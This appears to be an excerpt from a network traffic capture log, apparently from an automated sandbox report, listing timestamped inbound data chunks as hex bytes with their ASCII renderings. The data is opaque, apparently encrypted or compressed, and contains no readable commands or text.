                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20424INData Raw: 04 3f 4c 4b ea 19 a3 8d ba c1 d3 eb 0a 42 56 fe 60 79 00 62 13 c9 21 eb 2d fd f3 47 63 ad 8a 44 e8 1d a5 11 43 3e 77 d3 2b ca 7d 1f 7f 89 35 02 5a a7 56 53 73 d5 82 48 86 74 2f 79 1e cd e8 6d 6a bc 69 3a 03 05 40 91 d8 51 70 56 23 2d 6f 5e 35 06 17 ff a3 92 e7 54 f5 55 12 41 37 c1 75 7b 7f e4 38 db 8b 71 55 fe 9e b6 ef a0 4f 19 5b 45 51 ca 95 bf 62 20 cb 0d 85 97 33 8e 81 10 ba 4e f9 d7 be e5 84 dd 1b 39 25 34 6c 42 5b 4e 9d 6e 15 a3 03 ff e3 b0 fb cc d9 db cd 80 a0 74 01 09 e7 f6 0b 38 b4 df 4c 30 ff e7 90 6e c0 0e c1 5a 87 37 bc 44 5e 15 fc c6 4f 28 0b e4 e3 eb de ff 03 8b 95 95 06 f5 a5 61 d9 76 c2 92 61 df 8a fa ed 3f 1c 11 40 48 6b 3c d9 76 4f 6b ce e6 ac 0c c4 ae 8e d1 d8 4b a2 2f fd a4 2d 75 11 cf 6c 62 82 12 b8 27 9d fe 38 8d e1 70 21 fd 99 57 90
                                                                                                                                                                                                                                    Data Ascii: ?LKBV`yb!-GcDC>w+}5ZVSsHt/ymji:@QpV#-o^5TUA7u{8qUO[EQb 3N9%4lB[Nnt8L0nZ7D^O(ava?@Hk<vOkK/-ulb'8p!W
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20440INData Raw: 75 5d a0 6f 5d 35 72 d3 97 21 b1 10 8e c2 d3 b7 9a 46 b8 2f a0 60 86 72 25 4c be 9f 9d e8 86 16 44 2d 72 f4 75 37 50 0b ce 0e 88 8b c4 ac 8f de cb 20 4d 79 2b 95 0b 23 cb 52 2b 95 62 07 66 86 2b 9c 50 8e e7 39 9a 58 50 04 68 52 7b af f9 9e eb 66 a9 24 4a 5f 5d ff 43 98 67 57 46 84 8b 76 8a 00 53 22 e6 5d 12 06 c9 45 8b a1 93 30 10 ad 9b a6 86 a4 c4 af 50 8e c0 27 11 ab 57 a8 a9 0c 34 97 e1 b9 94 5d 1a 27 45 9f b6 bf b4 4b 9a 6b a1 af 92 ef 7e b4 d9 8a 11 04 40 2f c4 48 4d 67 46 19 f9 67 67 a3 a6 ad cd 00 53 7f 6f 50 6d 30 88 b5 69 c4 5a 3d 57 a3 01 7e b3 53 b5 47 f4 1d a6 9f 3d 29 67 26 6b 5f fb 86 1f d1 8c 0a eb 0b 43 7a 74 5e 35 97 d6 01 24 86 d6 93 5d 73 6c ed f5 25 9e 4c 65 7e 5c b2 0f 85 5f 81 b3 a3 31 52 b2 e2 34 9c 1e d5 7a 04 75 2a 57 cc f7 76 38
                                                                                                                                                                                                                                    Data Ascii: u]o]5r!F/`r%LD-ru7P My+#R+bf+P9XPhR{f$J_]CgWFvS"]E0P'W4]'EKk~@/HMgFggSoPm0iZ=W~SG=)g&k_Czt^5$]sl%Le~\_1R4zu*Wv8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20456INData Raw: d5 c2 b4 72 5b cf 6b bb 2d 6d 2e 9d 0f b1 c4 87 52 aa e3 0b 21 e5 e3 af 5c 2a cc d2 80 92 d4 b9 00 4b 19 64 4f e6 90 39 72 9e 89 9e 8b 85 90 52 de 7c 6e 59 74 f9 14 21 b6 d5 0f 04 99 c9 f2 63 7c f5 37 e4 ee ce a2 83 31 7b f5 69 e0 87 73 5c b8 16 46 09 cf d9 ce 02 68 4d 14 a9 5a 2d 8a 12 11 63 0f 30 35 95 fe 28 49 75 d6 53 b6 0a 52 46 24 21 85 14 49 68 e6 f2 0f 6d 87 8c 6c 8a e1 c0 5e 24 6e db c4 85 13 24 67 3f 4c fe 9e 29 b4 fb dc 98 3f c9 a1 1a fb 0d f3 b5 2c b6 5f 5b 36 23 a3 f1 64 36 87 38 28 01 dc 54 0f 4b a9 1f 15 51 f4 e8 76 33 f3 16 51 1b 67 01 e7 b8 46 61 5a b9 b2 d4 39 8b 37 96 29 4d e1 f3 a4 fd 21 29 58 b4 b8 33 bf 9f 79 b1 ce e0 35 2b fd 8e 78 71 c8 a8 b1 02 81 d9 af c5 21 90 22 d6 f4 86 cb 02 0a 57 ed 83 79 4a 25 5f fe 2b 99 24 ce 8b f3 e2 59
                                                                                                                                                                                                                                    Data Ascii: r[k-m.R!\*KdO9rR|nYt!c|71{is\FhMZ-c05(IuSRF$!Ihml^$n$g?L)?,_[6#d68(TKQv3QgFaZ97)M!)X3y5+xq!"WyJ%_+$Y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20472INData Raw: 31 f7 de aa 8c ef 96 7b 99 ee 45 0f 51 07 98 8a 37 c9 21 52 b6 60 14 e9 f8 03 97 8b 78 32 cf 0c fb 8b d9 04 d9 8c f8 94 13 7a 4d e4 00 31 0b 1e d5 d5 c8 cf 9d 16 4d e8 1b 0e e6 b5 07 5d 19 8a d4 2f 49 10 57 c0 e2 7f 0c 71 80 e1 3a 33 bf 62 72 84 cf e3 3f ca 87 28 2f ec 87 58 66 1e 34 a2 fc f0 fd 35 c2 3d 40 ca f2 8f f6 cb 65 d2 01 28 86 fc 19 2a 86 cb 50 fd 18 ad 49 a8 52 91 60 69 e5 96 7c 52 5a ab 8e aa 97 16 55 0d 97 dc d3 25 87 41 59 98 3e 73 63 d6 ed 05 33 b8 23 d7 d1 cc a5 44 a8 a1 07 9f 6c 24 00 7a d6 e2 0d aa a8 bb d8 c9 95 37 7d 40 51 d4 be 0f eb 39 91 1f a9 81 65 84 e6 1d fb ce 6d ce 38 94 32 9b 10 7c d7 0e 1c 70 e1 72 24 16 88 c9 48 78 0c 1e 9f af c7 f6 2e 90 92 b9 63 62 2e 99 3c c2 63 b5 33 ab dd 29 0d c5 2b 5f b5 79 7c c0 c4 fe 1b 36 ee 2e fd
                                                                                                                                                                                                                                    Data Ascii: 1{EQ7!R`x2zM1M]/IWq:3br?(/Xf45=@e(*PIR`i|RZU%AY>sc3#Dl$z7}@Q9em82|pr$Hx.cb.<c3)+_y|6.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20488INData Raw: fc 7b 9e 80 df b0 f7 9d a7 48 9f ed db 99 fc 78 de 17 a0 46 00 9f 5a 09 76 85 29 d8 a7 3e d3 9e 31 2d 95 a2 61 61 33 75 75 03 94 49 e5 61 2a 83 04 48 71 20 81 3e 23 4c 37 ca 45 ac 40 3e 1f 6b 4a c0 32 f7 f8 0a 7c a0 db ef b7 30 6f e5 f1 1d c4 49 a9 52 54 e9 26 b1 3b 17 de da ad 78 ee 62 91 c9 13 9a 51 5c 25 44 72 0d 46 d5 1a 4a 68 59 47 0e 84 54 fc f1 c3 79 3c 99 b1 5d 23 fa 8d 48 78 b4 1a 68 af 73 7a 1e 7f 6e 26 cb 56 fc a3 50 c8 99 29 8f 20 47 d6 85 59 48 4d ae 9a 10 7d 68 9a 17 75 0a 05 1a 30 aa 23 b7 03 ca 84 c4 cb 6c 4e 5b 77 d2 05 44 1a 1a 55 2e d4 63 88 30 ad aa f2 30 6c 8d d6 f4 76 08 4c a7 21 08 62 d2 5a be 5b c1 20 da 27 59 8b b2 5b bf 43 34 61 e2 92 01 89 c4 58 dd aa 01 6c 5b 26 19 88 7b 9d ba e3 c3 4b 7d 73 d0 ce 1c c5 4c 14 ba 04 d7 5f 93 1e
                                                                                                                                                                                                                                    Data Ascii: {HxFZv)>1-aa3uuIa*Hq >#L7E@>kJ2|0oIRT&;xbQ\%DrFJhYGTy<]#Hxhszn&VP) GYHM}hu0#lN[wDU.c00lvL!bZ[ 'Y[C4aXl[&{K}sL_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20504INData Raw: 7d 41 9f 4e 1f 98 84 1a 47 a3 20 f0 39 b0 c6 9b 64 48 f4 b5 26 0f 09 ed 77 d5 07 4c 4f 12 ef b0 da 24 dc 2d 16 57 3e 17 9a 08 74 62 2f bf 4f 23 19 f8 ae fc df 92 9e ad 81 ac c5 ad df 0c cd 6b 4c 89 ea 30 5b 68 b4 b7 e0 bb fa 1a 4c 99 e2 05 38 c2 f7 64 87 5c a6 da cb cd 13 62 a2 8d 3f ea db d3 c6 1d 9d 5b 86 f7 f5 2c ac 2f 33 0e 04 df cd 67 f2 3b fb 26 01 cb 12 a3 1c 34 54 4a 82 c2 b6 ed 78 5b 46 3e 10 17 c5 be 03 0a cf 1c 0b 46 b3 dc 2e 6d b8 68 02 aa 08 07 eb 5a 08 d2 1b 18 85 17 9c 87 69 65 82 c9 dc f8 4f ef b7 4a d9 50 04 02 a7 51 f0 75 93 79 d2 29 ac ef 36 c2 86 8e 77 3c e8 a2 bf 3b 3d a3 2a 2f d7 54 63 b5 e8 d5 45 e1 c3 44 d2 5c db e8 2f b5 4d c2 f2 e7 6c 2f 82 06 f2 1c 36 0b 86 09 7f 3e f7 67 87 80 03 21 27 da 52 6f ef cb 95 85 53 1a 86 78 7b d4 d3
                                                                                                                                                                                                                                    Data Ascii: }ANG 9dH&wLO$-W>tb/O#kL0[hL8d\b?[,/3g;&4TJx[F>F.mhZieOJPQuy)6w<;=*/TcED\/Ml/6>g!'RoSx{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20520INData Raw: 5e 4d 00 92 9f e5 28 e0 27 40 89 cf e0 95 cf 66 c3 ed dc b6 d3 b4 91 76 55 05 4d 64 10 d8 89 3a 43 bf 3d 1b a3 c0 b3 ff 8d 59 64 52 aa cc 52 a3 16 c8 39 b6 41 11 40 5b 7b a6 44 f7 86 be b2 62 5f 48 b3 9a 4d 4f e2 67 7d db 2a 40 09 48 cf 18 62 6c f5 9a 5b 3a 4e 39 9e c3 d3 c7 d3 4e ec 29 81 91 ec 26 01 ec 14 e1 a6 70 05 e2 2d f6 4c a2 80 80 9b 4c 7e 0e f0 04 5f 3a 59 02 2a 21 3a 72 61 5e 71 de b7 e6 34 85 12 56 99 ad a2 b4 d6 f6 79 f9 0f d9 d7 6e a5 d1 22 27 6c 16 25 2d 7a f2 f9 c6 ee d1 c0 d0 5d fc d8 85 a6 c5 aa dc d0 5a 3a 1c 3b cc 5d c0 32 4d a7 07 78 14 db fd d2 47 bf d7 21 2c 0c ce 5e c6 9e dd 4f 47 59 ea 0e 5e 78 41 0a 2c 7f 8e 8f db 50 c8 0a 6b 61 a0 58 68 72 fe 95 50 7f cf d0 78 05 fc 69 18 9c b7 5e ab 90 30 d4 57 ef 8c 92 a2 35 a1 30 dc b1 ce c2
                                                                                                                                                                                                                                    Data Ascii: ^M('@fvUMd:C=YdRR9A@[{Db_HMOg}*@Hbl[:N9N)&p-LL~_:Y*!:ra^q4Vyn"'l%-z]Z:;]2MxG!,^OGY^xA,PkaXhrPxi^0W50
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20536INData Raw: 65 0b dd fc fd fe f4 9a 3e 53 db da 8b c3 45 81 8f 55 b9 fd d6 bb 6d 72 d3 f6 c4 ab 5f 18 15 c5 81 aa cc 48 6a a2 cf 15 27 67 fd 4a c5 a5 ea c4 c5 bc d7 d7 a1 93 2d 24 4f ce 78 70 fd 13 f9 e6 d9 a5 f2 97 6e 92 8f 08 3f f5 d6 bc ca c8 be af 10 5c 3e 3b 14 d2 3d ab 65 aa 72 6c 3d c0 7c ee e2 74 47 21 3a e9 32 3d 59 94 20 78 41 34 a9 bf f6 4a f6 4a 8f 67 57 4f d2 ad 0d 8f 6b b5 dc 26 97 6e b9 75 7c 5a 74 53 f8 1e 0f 18 69 8d 30 96 19 24 8c 7a b5 6c 78 55 49 68 9c 1b d3 5f 7b 5d 00 48 53 fd 9c 92 62 86 f4 f5 25 8f 79 b5 d9 0c f3 1b 33 24 e9 93 3f 90 31 fe 94 6f 9c 0c 29 37 3c 24 49 ac 98 29 25 63 b5 a5 58 39 21 e6 aa 0d cd 66 a7 6a 00 89 f9 61 f4 6d d0 cb 92 2e ae ac 5a 7d e0 33 16 5e 79 1a b4 3b 49 98 ed 19 e2 24 5d 3c a9 ed 9e 4a e6 64 09 a9 c8 3a 89 65 a3
                                                                                                                                                                                                                                    Data Ascii: e>SEUmr_Hj'gJ-$Oxpn?\>;=erl=|tG!:2=Y xA4JJgWOk&nu|ZtSi0$zlxUIh_{]HSb%y3$?1o)7<$I)%cX9!fjam.Z}3^y;I$]<Jd:e
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20552INData Raw: 18 e6 56 12 5b 2e 80 e6 57 2c 3b 98 c0 ed f8 af 4b 75 6d 39 0a ba 4a 61 14 21 4f 5c a4 ba 05 8a 78 85 1b e8 63 99 48 31 7a aa f2 5e bd b3 40 84 38 39 6e f2 9d 9f 91 ac 62 29 81 fe 65 4e ed 2e c4 22 4e 27 f4 27 0b d4 55 33 f0 c7 6f fa 6e b5 52 a7 20 64 94 14 6e ae 48 5d 2d 1a 30 c4 34 59 0f aa 23 86 91 1c cf d8 90 1d 42 ac 22 3d 65 1f 46 85 a7 f8 f3 0d 24 7e 91 6a b3 29 8b bf ce 61 4f 75 21 b6 23 67 87 cc 3b 77 eb c2 dc 0e e6 c8 1b eb e2 5a a3 0c bd c9 5d eb 25 dd f9 cd 2e f5 25 24 e9 eb 87 3e 4d 93 35 b4 d2 2e f6 d3 00 90 0a 37 93 cb 0f 80 57 63 05 49 80 24 b4 f0 92 1d c8 ce 3a 40 f2 a5 2e 90 30 8f c9 43 b9 a9 fb e6 9e d3 2a 23 c0 2a 93 14 87 13 86 65 a6 bd 29 8d 89 b6 dc 92 7d 8b 2b 91 52 d1 53 98 df e2 38 f6 bb 1d 96 db d8 b6 06 a7 0b 32 71 ba 8a c2 07
                                                                                                                                                                                                                                    Data Ascii: V[.W,;Kum9Ja!O\xcH1z^@89nb)eN."N''U3onR dnH]-04Y#B"=eF$~j)aOu!#g;wZ]%.%$>M5.7WcI$:@.0C*#*e)}+RS82q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20568INData Raw: 81 33 e0 28 d9 34 78 87 eb 26 06 f3 20 57 6a d9 e7 c4 ab 6c 06 cc 6f 7e 4e a4 29 3a 5e ca 88 cc 84 16 cd bb c0 b7 70 26 15 75 ae dd 71 81 e2 6c a2 18 96 a7 e2 8e 26 34 82 42 93 ac c6 9f cf 35 8b e7 30 06 4a 7a 7d e4 54 33 f8 d6 5c 38 72 ae 57 8c b8 8d 9c b0 ed c4 eb 8e e4 2e 9c 7b 1d 6d e2 77 09 d7 f6 01 04 28 e7 76 ea 70 a4 10 83 c1 34 16 9d 92 1c 9b 36 61 54 22 bb 1f 31 74 05 a8 b4 9a 12 43 45 8b 1c 07 36 aa 8f 40 38 dd c6 c9 45 6d 40 9e 93 1f 21 95 e3 7a 7f 86 01 b8 1a d9 63 1f 4a c8 37 95 17 c9 76 27 23 1b c6 91 2b cc 4c 98 de 91 0b 4e 0a 31 34 c9 6b b5 7d 75 3e 27 db e1 16 d0 bb f0 0d fe 4e af b1 5c c2 48 10 3a 95 a0 a7 fd 5d 39 3a cf ba a3 7b 2f e2 a2 57 09 da 8a c8 fc 8b 61 b2 b0 26 64 6c d4 4d 82 72 a1 6d a6 b8 12 6a 81 45 5f a8 be 66 22 e1 95 97
                                                                                                                                                                                                                                    Data Ascii: 3(4x& Wjlo~N):^p&uql&4B50Jz}T3\8rW.{mw(vp46aT"1tCE6@8Em@!zcJ7v'#+LN14k}u>'N\H:]9:{/Wa&dlMrmjE_f"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20584INData Raw: 94 9d b5 fc 4c 8e 1c 7b 09 f6 9a d3 05 a6 02 b7 73 7d 45 b2 f4 07 89 33 84 88 64 fa 04 4f d5 bf 89 d3 4a 8f fe 7c 20 84 03 90 62 f6 6d 6c f2 38 73 58 89 6c 0e a3 a9 42 3c a8 ef 86 78 35 fa 24 43 07 db d7 24 8c 60 92 42 91 96 a9 df e0 ae a7 cc 8a 47 4d a8 e7 ae 4a 4f b1 af ef 69 fa d8 8e d2 c8 90 50 b2 d3 2e b3 e1 b8 6d 3d 96 4b 67 fd ec 60 96 6c 78 65 ee f5 e0 6a 5e 31 6f 7a 95 ea 34 b6 83 ed 7c 8a c1 1c 10 15 c2 dc f3 1f d7 0b a6 84 db 61 18 2c 2d 46 6c a2 ec dd 21 cc 80 c3 dd c8 2d 4a 3a 1f 53 e2 4d 77 72 96 4d f8 3f 8f a5 48 b8 0e cb 56 10 02 89 43 27 24 f0 0e c3 6d e7 1a b3 62 17 91 d1 c2 e1 41 77 26 2e 9d 13 41 b9 0a d1 19 88 86 7f cb 2b 9a f3 80 db 2a 1e 1e ff fb 98 35 18 70 08 8c 58 ae ee 64 ad 0a a5 01 16 96 50 74 1b 95 4d cd bb 48 ce 54 df b4 6e
                                                                                                                                                                                                                                    Data Ascii: L{s}E3dOJ| bml8sXlB<x5$C$`BGMJOiP.m=Kg`lxej^1oz4|a,-Fl!-J:SMwrM?HVC'$mbAw&.A+*5pXdPtMHTn
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20600INData Raw: 51 e0 ff 84 76 95 ba 8c 76 81 98 5b 1c f1 70 ec f4 4c 6d ba 72 db 3d b1 5d 07 66 e2 2f bc 3e d9 53 6a 0c 96 bf 53 e4 90 6f e4 e7 af bf 05 48 27 b0 20 70 15 d9 99 ee 5e 02 b7 d1 5d 05 16 4a ca 7f 50 75 b0 43 3b 05 92 6c f6 f8 14 67 84 22 98 25 d7 31 8c 84 08 4c 79 10 3a e5 6c fc 2f ec 59 c3 1a 39 e4 12 f1 95 be bc e6 a1 b0 74 5f 3f 9c 66 d9 ca 29 a8 c7 a1 b9 31 e0 4f 41 4e 68 97 29 88 19 7a 2d 06 54 89 c0 26 be 73 70 56 2e 5c c0 2c d6 97 95 74 23 e6 cd 96 b7 bf 22 1e ae db f3 31 57 e1 44 0c 59 b3 d0 fe 93 2d 86 df f8 cf 78 83 8c b5 10 51 fd 15 04 a1 fe ed 1e a5 16 52 ee f4 d7 5a d1 8f f8 61 59 e5 20 2a 7b 84 f4 87 83 01 f9 69 4b 83 db 25 62 cd 42 21 9b 5b 9f 52 e1 2e e6 81 6a 1a fa 05 2b 38 31 06 d3 90 d1 96 ca e1 d6 d9 cb c0 0c 62 43 66 ce c9 42 f6 38 3c
                                                                                                                                                                                                                                    Data Ascii: Qvv[pLmr=]f/>SjSoH' p^]JPuC;lg"%1Ly:l/Y9t_?f)1OANh)z-T&spV.\,t#"1WDY-xQRZaY *{iK%bB![R.j+81bCfB8<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20616INData Raw: cd 67 63 99 6a 42 d7 86 6a 00 6c 31 3a 16 51 ad 3e d5 e5 5b 3f 5a 34 72 8f 14 8e e0 68 2d e0 8d b6 aa a8 11 e9 31 88 79 6b 9e a6 4b a4 46 2f be e7 ac e0 f4 8b 2a a8 15 98 01 6f 89 80 2d 02 30 ee 28 8d f2 61 d0 03 e9 ba 8f fc 0f 47 df c3 f5 7e dc 0f 13 f9 fa 5d cc d5 6c 7d a2 69 4c 0b 1a 75 7f 2f 8c da a8 7a af bd 5a be 21 5e da 76 e6 19 b6 15 73 e5 45 e1 84 2b 36 4a 63 e5 24 a8 32 59 4e 5d c5 48 ef ee ff 9f d4 2f 2a 31 fc 24 e0 a7 d7 ba 89 27 2e 25 80 19 9b 04 aa 19 67 c1 6c 87 ab e0 a6 21 7a fb c0 17 4d b0 10 ec 6f c1 0b 9e 90 37 34 26 17 3b 18 23 48 32 2c 06 c5 aa bf 2a ef ca ef 06 d1 18 3e f6 cd 60 a0 f3 da 82 7c 95 48 4b 5a c0 04 1a d2 ba e5 a0 40 34 bd fd 09 43 2c d5 40 67 7f 4e 48 fe b2 66 1d 18 2a 4a 77 f7 eb 88 b9 e4 40 0c d1 ca be 4b 8d 20 f2 dd
                                                                                                                                                                                                                                    Data Ascii: gcjBjl1:Q>[?Z4rh-1ykKF/*o-0(aG~]l}iLu/zZ!^vsE+6Jc$2YN]H/*1$'.%gl!zMo74&;#H2,*>`|HKZ@4C,@gNHf*Jw@K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20632INData Raw: af e7 ed 55 b0 f4 24 8d 53 b3 04 6e 12 0a d9 f2 38 34 3f 5b 70 05 79 4f 03 3f 1c a2 aa 3d 84 df 4a ce a7 6a e6 aa ea 52 a3 2e 53 80 0f d4 1c de 1e 68 85 ee 87 d5 87 4e 0c 1b 20 60 71 7c 08 c8 b3 1c 28 ee 2a 7b 8b dc c4 92 8d cb 42 a2 45 4b d1 65 a3 b1 9c 9c f5 06 a7 dc 5e ca 32 d2 b6 f6 4e 30 7a cd f5 a3 a5 81 63 24 36 41 81 97 f4 00 3e bc 0f b8 0b c4 82 b0 df 7d 88 22 59 ec c0 ac f0 02 6e 3e 5b 63 95 49 a9 cf 2c ee 1f fc 9b 06 08 d5 47 94 5e 8e 37 c6 df 09 77 75 5a 49 b8 27 48 b6 52 ea 54 5b 50 3e 47 af 8f 46 f3 ee 7b 44 0c 5a b5 8e 23 1d 1b d6 d9 8e c1 ce 21 4b c3 ac 95 bf 88 21 e9 68 d1 8a 74 4d 15 ac 1d 23 26 2c 49 6c 99 17 ff 9e 5a 13 0b 06 87 bf 31 9b db 28 34 50 a5 52 c5 fc 3f de 2c 23 fd 65 41 f9 89 e2 48 c1 22 a0 c9 58 84 71 6e f6 71 c1 b6 3d 5f
                                                                                                                                                                                                                                    Data Ascii: U$Sn84?[pyO?=JjR.ShN `q|(*{BEKe^2N0zc$6A>}"Yn>[cI,G^7wuZI'HRT[P>GF{DZ#!K!htM#&,IlZ1(4PR?,#eAH"Xqnq=_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20648INData Raw: d5 2a 36 30 ae b9 4c 7b 9e 31 72 6b 63 a1 fd 2d 24 01 c1 47 61 78 34 87 77 70 bd 9c d8 37 d0 04 f7 56 8b 2c b2 7c 94 6f f5 e2 6c 18 b8 d8 d6 96 d1 e0 05 69 fd 95 1e 08 e3 d7 d0 9a ee c4 09 a6 e2 c7 b7 ad 36 f3 57 a8 e4 e5 83 7f b3 41 e8 a0 af 86 80 81 c8 59 b0 22 32 99 fb c8 ad 03 f1 bd 80 a3 84 cc 4f 4c c4 2b 1a f9 c0 52 30 63 96 97 ad 9b 6b a4 48 47 39 44 60 26 91 9f 43 70 34 cf 5a 8f 7c d4 e1 e9 ed 1a 80 82 14 94 87 e4 18 91 7e cf 5d 95 01 70 36 68 37 9b f6 d1 ea 16 d3 98 32 94 e8 63 99 90 69 05 b6 f5 3e e9 04 fa 7f 27 4b 69 d4 5c d0 a2 f3 c3 3a de 28 cb eb f4 42 59 b3 ba 79 ff 07 56 ad 52 65 2e 77 80 2c 36 c1 91 10 d9 9e 48 53 50 ff 48 dd 24 72 ab ec a3 5a 1a 39 74 e5 ca 07 05 e6 f2 f0 de 63 40 6c 32 f1 a5 00 a0 0f cb b2 c0 3a cf 2b 07 ac 05 fb bc 54
                                                                                                                                                                                                                                    Data Ascii: *60L{1rkc-$Gax4wp7V,|oli6WAY"2OL+R0ckHG9D`&Cp4Z|~]p6h72ci>'Ki\:(BYyVRe.w,6HSPH$rZ9tc@l2:+T
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20664INData Raw: c9 51 a5 b5 8c ec 87 dd a6 fb 0b 32 bf cf 47 8f 86 9d b1 17 04 72 89 69 64 d8 1a c7 b7 5d 28 2d 10 59 f3 fd 54 dc 02 00 99 de 53 3d f1 14 e7 b4 1f 02 ab 3b cc ea a7 67 f3 b6 9c 8f 85 a6 02 71 5b a5 a4 87 b5 64 8e 5a a7 d4 37 fd dc 23 63 ce 0c 05 ff 47 11 7c 7b dc da c6 a3 0d d0 1a 3b ac f3 6c d1 38 b7 01 e4 69 84 c5 dd 0e 63 4b c2 c9 b5 4d be 46 08 c3 dc 89 be 02 c4 c9 38 e3 7b d8 a7 c5 7a 87 45 59 17 03 c0 b0 08 7a 61 e7 2f 05 a0 a3 2a 2d 64 e2 c9 a0 51 09 32 e4 13 7e fd 11 36 26 ed de 70 fc 14 f4 79 d1 8b 1f 6a a8 19 52 58 90 6e e5 0f db bd a7 cb 41 c3 78 f7 fe 65 e5 c9 df c1 fa 53 c0 39 33 68 13 1e 37 91 ed b6 d9 c7 4c 37 aa fb d7 fd 00 88 cb 84 20 0a 76 78 dd fd 31 d9 0d b8 69 76 eb 3e 62 67 90 67 67 63 64 02 57 d0 3e 6d b8 44 fd 80 7a 1c 18 46 73 72
                                                                                                                                                                                                                                    Data Ascii: Q2Grid](-YTS=;gq[dZ7#cG|{;l8icKMF8{zEYza/*-dQ2~6&pyjRXnAxeS93h7L7 vx1iv>bgggcdW>mDzFsr
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20680INData Raw: 0e 7b cf dd d9 81 9c 88 4d 3b 70 52 12 5d f5 09 37 5f ef 0c ea 8f 94 af 7d 45 d3 ee 9e 7f 84 71 58 ea 7f c6 4e b8 c4 d8 14 9a 21 f5 0c 57 b6 8c 78 bc a1 4a 24 9d ff 5a 6c f3 89 fd bf c8 c2 73 b4 11 b5 41 07 5f 85 01 22 a1 19 58 d5 5c 7b f4 be 70 a4 ba da 23 7a 70 26 ee 41 54 16 e8 d8 c8 b3 d2 c9 13 5f 34 a0 d5 de d0 99 a9 90 1b 17 a2 43 b7 a8 ee 19 c4 53 cc c5 37 fc 2f 15 b8 db 9a 2f 76 f0 f7 ce 45 aa 0f f6 21 3a 29 fa c4 2e 4c 80 0d 01 68 bd be 26 5b 1e 31 c7 ae 8d 14 ea b9 89 de 2c 1a 83 8f c0 0b b9 fb 61 cf 19 8f be 44 0d 9f f0 8f b5 54 b2 0a 00 94 0a c8 a4 f1 d5 ed 61 bc 1d a2 c9 49 8e 96 18 fb 8f 54 d6 8c f9 f0 c6 cb 9b 7a 3d e6 83 8d c1 d8 fc 82 28 c7 86 53 75 c4 56 68 e9 43 a8 be 26 9f 32 3e aa 38 d3 1e 2c c0 37 16 2b 95 1b dc ff 1b 35 05 30 13 4c
                                                                                                                                                                                                                                    Data Ascii: {M;pR]7_}EqXN!WxJ$ZlsA_"X\{p#zp&AT_4CS7//vE!:).Lh&[1,aDTaITz=(SuVhC&2>8,7+50L
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20696INData Raw: b7 59 03 f5 10 53 de e0 37 e1 08 5a c5 91 04 d6 3b 20 67 7c c3 42 9a 01 5a 2d ed db 88 f2 ab 68 cc f3 b7 fd e2 85 53 2d f9 b4 b9 9b 54 44 c2 b5 39 18 c4 2e 47 6c 1a 3b 92 eb fa c2 62 fe 8c 81 14 ea 51 e3 08 d5 58 ef 44 54 e7 85 93 8b 49 de d8 e1 64 d0 b7 35 4f d8 bf 74 2b c7 de 52 ea f5 a8 43 1b 52 8f 33 60 28 b2 57 bd d2 50 31 a1 d6 b7 97 11 e2 e8 d4 dc 95 0d 8a 89 13 12 47 cb d9 06 22 b5 81 1b a4 d1 92 dd e9 f5 8a 99 41 e3 f8 4d 9b f3 9d 5d 3e f4 12 93 a6 8f 73 a8 18 7d fb d9 cb 28 b8 f6 d0 9d aa 93 a8 3b 89 ed 57 4e 66 c5 e6 19 8d a0 49 cc 64 9f e3 b0 6c 83 0d d6 40 45 5c a0 7b 02 ba f6 ff 30 54 b1 52 cc 37 79 7c d6 75 66 b0 00 2f dd 1b 2a 89 58 18 fe b2 d2 46 32 e7 a2 fc 05 2a a6 ed 6d e7 78 de d3 16 2a af d5 92 25 0b ae 53 83 88 3b 83 b6 6f e8 60 87
                                                                                                                                                                                                                                    Data Ascii: YS7Z; g|BZ-hS-TD9.Gl;bQXDTId5Ot+RCR3`(WP1G"AM]>s}(;WNfIdl@E\{0TR7y|uf/*XF2*mx*%S;o`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20712INData Raw: 90 50 c2 3b 0b 21 9f 36 1b 12 5c 81 01 94 c9 6c 96 e8 45 6e ae d4 a3 8c e8 bb de fd 81 f4 78 66 96 8c 86 4e 8b 07 76 63 4c 4f e6 93 0a f5 72 60 4e 9d 03 a1 4b 01 7d 74 76 5e 4a d6 a4 38 07 0d a5 be 19 cf 18 a1 33 73 5b dd 56 6f 61 e0 67 aa 0f 5e ac 10 b8 ea cd db 1b 54 4a 91 8c fe 6b 5a 4a 98 bf de f0 69 06 27 93 68 5f fa b8 fa bf 15 94 df 5a cc 7b 4a 96 2b ee f7 90 88 25 71 4e 52 ae a0 ab a4 50 a4 2b 66 94 d4 90 13 71 3c a3 44 c9 71 7b fb fc fa 4f 4f 1d c5 6c 86 40 2f d2 d9 ac 4f ef ba 2e 12 a7 f9 68 6b e2 58 70 0e 9f c1 27 2f 34 52 0d 4b fa 78 5b a9 24 a9 58 07 c7 dc 43 d9 f0 9a 81 49 e5 28 eb 59 6a f0 1b 5e c2 e9 11 ac 1e c8 8f 72 09 81 8b 17 f9 be 9e be e6 77 98 e8 21 ed e1 ae 44 fc a4 2e 0b d2 d7 6d a6 2a f7 91 93 e5 b0 37 21 cf 18 02 14 54 24 39 6e
                                                                                                                                                                                                                                    Data Ascii: P;!6\lEnxfNvcLOr`NK}tv^J83s[Voag^TJkZJi'h_Z{J+%qNRP+fq<Dq{OOl@/O.hkXp'/4RKx[$XCI(Yj^rw!D.m*7!T$9n
